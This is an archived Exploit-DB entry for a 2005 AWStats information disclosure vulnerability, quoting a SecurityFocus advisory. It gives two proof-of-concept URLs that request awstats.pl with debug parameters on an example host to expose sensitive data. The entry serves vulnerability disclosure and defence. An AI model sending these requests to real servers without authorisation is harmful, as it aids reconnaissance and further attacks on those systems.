AWStats 5.x/6.x Debug Remote Information Disclosure Vulnerability

2005-02-14T00:00:00
ID EDB-ID:25096
Type exploitdb
Reporter GHC
Modified 2005-02-14T00:00:00

Description

AWStats 5.x/6.x Debug Remote Information Disclosure Vulnerability. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/12545/info

A remote information disclosure vulnerability reportedly affects AWStats. This issue is due to a failure of the application to properly validate access to sensitive data.

An attacker may leverage this issue to gain access to potentially sensitive data, possibly facilitating further attacks against an affected computer. 

http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?debug=1
http://www.example.com/cgi-bin/awstats-6.4/awstats.pl?debug=2